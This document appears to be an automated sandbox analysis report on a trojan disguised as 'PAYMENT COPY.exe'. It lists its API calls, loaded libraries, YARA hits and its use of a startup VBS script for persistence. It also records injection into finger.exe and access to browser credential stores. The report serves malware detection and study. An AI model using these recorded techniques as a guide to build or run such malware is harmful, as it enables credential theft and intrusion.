                      Source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20Y&
                      Source: finger.exe, 00000004.00000003.1350056797.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                      Source: finger.exe, 00000004.00000002.3353879564.00000000053EE000.00000004.10000000.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000008.00000002.3353285344.000000000432E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.star.ne.jp/

                      E-Banking Fraud

                      Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3348154175.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3352771061.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3351872954.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1159249310.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3351350564.0000000003320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1158626557.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3351843666.0000000002610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1162118891.0000000001CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      System Summary

                      Source: initial sampleStatic PE information: Filename: PAYMENT COPY.exe
                      Source: PAYMENT COPY.exeStatic file information: Suspicious name
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0042CE23 NtClose,1_2_0042CE23
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012B60 NtClose,LdrInitializeThunk,1_2_01012B60
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_01012DF0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_01012C70
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010135C0 NtCreateMutant,LdrInitializeThunk,1_2_010135C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01014340 NtSetContextThread,1_2_01014340
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01014650 NtSuspendThread
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012B80 NtQueryInformationFile
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012BA0 NtEnumerateValueKey
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012BE0 NtQueryValueKey
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012BF0 NtAllocateVirtualMemory
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012AB0 NtWaitForSingleObject
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012AD0 NtReadFile
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012AF0 NtWriteFile
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012D00 NtSetInformationFile
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012D10 NtMapViewOfSection
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012D30 NtUnmapViewOfSection
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012DB0 NtEnumerateKey
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012DD0 NtDelayExecution
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012C00 NtQueryInformationProcess
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012C60 NtCreateKey
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012CA0 NtQueryInformationToken
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012CC0 NtQueryVirtualMemory
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012CF0 NtOpenProcess
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012F30 NtCreateSection
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012F60 NtCreateProcessEx
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012F90 NtProtectVirtualMemory
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012FA0 NtQuerySection
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012FB0 NtResumeThread
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012FE0 NtCreateFile
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012E30 NtWriteVirtualMemory
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012E80 NtReadVirtualMemory
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012EA0 NtAdjustPrivilegesToken
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01012EE0 NtQueueApcThread
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01013010 NtOpenDirectoryObject
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01013090 NtSetValueKey
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_010139B0 NtGetContextThread
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01013D10 NtOpenProcessToken
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe, Code function: 1_2_01013D70 NtOpenThread
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E4340 NtSetContextThread, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E4650 NtSuspendThread, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2B60 NtClose, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2BF0 NtAllocateVirtualMemory, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2BE0 NtQueryValueKey, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2BA0 NtEnumerateValueKey, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2AD0 NtReadFile, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2AF0 NtWriteFile, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2F30 NtCreateSection, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2FE0 NtCreateFile, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2FB0 NtResumeThread, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2EE0 NtQueueApcThread, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2E80 NtReadVirtualMemory, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2D10 NtMapViewOfSection, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2D30 NtUnmapViewOfSection, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2DD0 NtDelayExecution, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2DF0 NtQuerySystemInformation, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2C70 NtFreeVirtualMemory, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2C60 NtCreateKey, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2CA0 NtQueryInformationToken, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E35C0 NtCreateMutant, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E39B0 NtGetContextThread, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2B80 NtQueryInformationFile
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2AB0 NtWaitForSingleObject
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2F60 NtCreateProcessEx
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2F90 NtProtectVirtualMemory
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2FA0 NtQuerySection
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2E30 NtWriteVirtualMemory
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2EA0 NtAdjustPrivilegesToken
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2D00 NtSetInformationFile
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2DB0 NtEnumerateKey
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2C00 NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2CC0 NtQueryVirtualMemory
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E2CF0 NtOpenProcess
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E3010 NtOpenDirectoryObject
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E3090 NtSetValueKey
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E3D70 NtOpenThread
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_035E3D10 NtOpenProcessToken
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_02BC9790 NtCreateFile
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_02BC9AB0 NtClose
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_02BC9A00 NtDeleteFile
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_02BC9900 NtReadFile
                      Source: C:\Windows\SysWOW64\finger.exe, Code function: 4_2_02BC9C10 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 035E5130 appears 53 times
Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 0362F290 appears 98 times
Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 035F7E54 appears 102 times
Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 0359B970 appears 210 times
Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 0361EA12 appears 76 times
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: String function: 00FCB970 appears 210 times
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: String function: 0104EA12 appears 76 times
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: String function: 0105F290 appears 98 times
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: String function: 01015130 appears 53 times
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: String function: 01027E54 appears 94 times
Source: PAYMENT COPY.exe, 00000000.00000002.1054440794.0000000005D60000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000000.00000002.1027023009.000000000084E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000000.00000002.1052268046.00000000057A0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameDigfuwmfm.dll" vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000000.00000002.1027702847.00000000029CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000001.00000002.1159408870.00000000010CD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000001.00000002.1159114036.0000000000B48000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamefinger.exej% vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: PAYMENT COPY.exe, SegmentedMap.cs | Cryptographic APIs: 'CreateDecryptor'
Source: HashSize.exe.0.dr, SegmentedMap.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PAYMENT COPY.exe.3c23fd0.0.raw.unpack, SegmentedMap.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, ITaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, TaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, Task.cs | Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, TaskService.cs | Task registration methods: 'CreateFromToken'
Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, ITaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, TaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, TaskPrincipal.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, TaskSecurity.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, TaskSecurity.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, TaskPrincipal.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, Task.cs | Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, TaskSecurity.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, TaskSecurity.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, Task.cs | Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, User.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, TaskFolder.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, TaskFolder.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, User.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@12/4@19/11
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Mutant created: NULL
Source: C:\Windows\SysWOW64\finger.exe | File created: C:\Users\user\AppData\Local\Temp\4ub-1K1Qxn
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs"
Source: PAYMENT COPY.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PAYMENT COPY.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: finger.exe, 00000004.00000002.3348989479.0000000003024000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3348989479.0000000003052000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3348989479.000000000302F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: PAYMENT COPY.exe | Virustotal: Detection: 50%
Source: PAYMENT COPY.exe | ReversingLabs: Detection: 39%
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | File read: C:\Users\user\Desktop\PAYMENT COPY.exe
Source: unknown | Process created: C:\Users\user\Desktop\PAYMENT COPY.exe "C:\Users\user\Desktop\PAYMENT COPY.exe"
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Process created: C:\Users\user\Desktop\PAYMENT COPY.exe "C:\Users\user\Desktop\PAYMENT COPY.exe"
Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe | Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe"
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Process created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe"
Source: C:\Windows\SysWOW64\finger.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Section loaded: gpapi.dll
Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe | Section loaded: mswsock.dll
